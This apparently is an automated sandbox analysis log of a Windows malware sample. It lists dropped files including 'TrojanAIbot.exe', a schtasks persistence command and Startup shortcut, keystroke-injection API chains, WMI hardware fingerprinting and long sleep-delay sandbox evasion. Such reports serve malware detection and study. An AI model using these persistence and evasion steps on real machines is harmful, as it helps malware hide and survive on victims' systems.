Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F97DF0 push 00F981E6h; ret 16_2_00F97E2D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F97DF0 push 00F97FCCh; ret 16_2_00F982BB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F97DF0 push 00F98468h; ret 16_2_00F9852D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F9852Eh; ret 16_2_00F97F3A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98514h; ret 16_2_00F97F66
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F97E66h; ret 16_2_00F98057
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F9817Ah; ret 16_2_00F9808B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F982E5h; ret 16_2_00F980D9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F9826Ah; ret 16_2_00F9819E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F9849Ch; ret 16_2_00F981E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98321h; ret 16_2_00F982E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F97FBFh; ret 16_2_00F9831F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F97FA8h; ret 16_2_00F9834C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F984BAh; ret 16_2_00F983E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98426h; ret 16_2_00F984D8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98075h; ret 16_2_00F984FD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F9808Ch; ret 16_2_00F98512
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98D45h; ret 16_2_00F987D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98AB5h; ret 16_2_00F98B13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98784h; ret 16_2_00F98CA1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98DC9h; ret 16_2_00F98E1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 push 00F98D14h; ret 16_2_00F98E2E
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 16_2_00F9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,16_2_00F9CBD0

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_0047A330
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_0047A330
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_00434418
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API/Special instruction interceptor: Address: 4739024
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API/Special instruction interceptor: Address: 48458D4
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API/Special instruction interceptor: Address: 493724C
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API/Special instruction interceptor: Address: 4B5C24C
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API/Special instruction interceptor: Address: 4B5B24C
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API/Special instruction interceptor: Address: 49A924C
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Memory allocated: 3120000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Memory allocated: 3220000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Memory allocated: 15F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Memory allocated: 31F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Memory allocated: 3040000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | Memory allocated: 30D0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | Memory allocated: 3240000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | Memory allocated: 5240000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 21E0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 2390000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 4390000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 1840000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 3330000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 5330000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 1040000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 2AA0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Memory allocated: 4AA0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 1200000
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 1199790
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 1199683
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 1199484
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 1199375
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Thread delayed: delay time: 1199265
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Window / User API: threadDelayed 4504
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Window / User API: threadDelayed 5304
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | Window / User API: threadDelayed 1732
                                Source: C:\Users\user\AppData\Local\Temp\build.exe | Window / User API: threadDelayed 2548
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8842
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 751
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Window / User API: threadDelayed 3346
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Window / User API: threadDelayed 6443
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_2-87754
                                Source: C:\Users\user\AppData\Local\Temp\x.exe | API coverage: 3.7 %
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6820 | Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -30437127721620741s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -200000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99890s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99779s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99672s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99556s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99397s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99280s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -98375s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -98172s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -98046s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97937s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97815s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97669s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97560s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97450s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97334s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97203s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -97093s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -96984s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -96875s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -96766s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -96656s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -96547s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -96437s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99874s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99536s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99410s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696 | Thread sleep time: -99054s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98903s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98781s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98672s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98562s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98451s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98328s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98203s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -98094s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97984s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97875s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97765s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97656s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97547s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97436s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97328s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97219s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97109s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -97000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96872s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96750s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -96599s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1200000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199790s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199683s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199484s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199375s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199265s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2648Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 1436Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5208Thread sleep count: 8842 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5188Thread sleep count: 751 > 30
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4676Thread sleep time: -200760000s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4676Thread sleep time: -386580000s >= -30000s
                                Source: C:\Windows\SysWOW64\timeout.exe TID: 5288Thread sleep count: 35 > 30
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4868Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 6856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99779
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99672
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99556
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99397
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99280
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98375
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98172
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98046
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97937
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97815
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97669
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97560
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97450
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97334
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97203
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97093
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96984
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96875
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96766
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96656
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96547
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96437
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99874
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99536
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99410
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99054
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98903
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98781
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98562
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98451
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98328
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98203
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98094
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97984
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97875
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97656
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97547
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97436
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97328
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97219
